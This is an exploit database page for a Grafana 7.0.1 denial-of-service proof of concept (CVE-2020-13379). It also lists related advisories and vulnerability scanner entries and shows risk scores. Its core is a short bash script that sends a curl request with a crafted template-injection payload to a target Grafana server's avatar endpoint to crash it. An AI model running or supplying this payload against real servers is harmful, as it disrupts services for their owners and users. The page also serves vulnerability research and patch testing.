Grafana 7.0.1 - Denial of Service Exploit

🗓️ 07 Jul 2020 00:00:00Reported by mostwanted002Type

zdt🔗 0day.today👁 416 Views

Grafana 7.0.1 Denial of Service (PoC) Exploi

Reporter	Title	Published	Views	Family All 141
Gitee	Exploit for Server-Side Request Forgery in Grafana	1 Aug 202222:25	–	gitee
ATTACKERKB	CVE-2020-13379	3 Jun 202000:00	–	attackerkb
Tenable Nessus	Alibaba Cloud Linux 3 : 0073: grafana (ALINUX3-SA-2021:0073)	14 May 202500:00	–	nessus
Tenable Nessus	CentOS 8 : grafana (CESA-2020:2641)	1 Feb 202100:00	–	nessus
Tenable Nessus	Fedora 32 : grafana (2020-a09e5be0be)	17 Jun 202000:00	–	nessus
Tenable Nessus	Fedora 31 : grafana (2020-e6e81a03d6)	17 Jun 202000:00	–	nessus
Tenable Nessus	MiracleLinux 8 : grafana-6.3.6-2.el8 (AXSA:2020-596:01)	20 Jan 202600:00	–	nessus
Tenable Nessus	openSUSE Security Update : SUSE Manager Client Tools (openSUSE-2020-1105)	28 Jul 202000:00	–	nessus
Tenable Nessus	openSUSE Security Update : grafana / grafana-piechart-panel / grafana-status-panel (openSUSE-2020-892)	20 Jul 202000:00	–	nessus
Tenable Nessus	Oracle Linux 8 : grafana (ELSA-2020-2641)	24 Jun 202000:00	–	nessus

# Exploit Title: Grafana 7.0.1 - Denial of Service (PoC)
# Exploit Author: mostwanted002
# Vendor Homepage: https://grafana.com/
# Software Link: https://grafana.com/grafana/download
# Version: 3.0.1 - 7.0.1
# Tested on: Linux
# CVE : CVE-2020-13379

#!/bin/bash

if [[ $1 != "" ]]; then
    curl -I "${1}/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D"
else
    echo "Usage: grafana-dos.sh <TARGET>.   Example: grafana-dos.sh http://localhost:3000"
fi

07 Jul 2020 00:00Current

8.3High risk

Vulners AI Score8.3

CVSS 26.4

CVSS 3.18.2

EPSS0.9295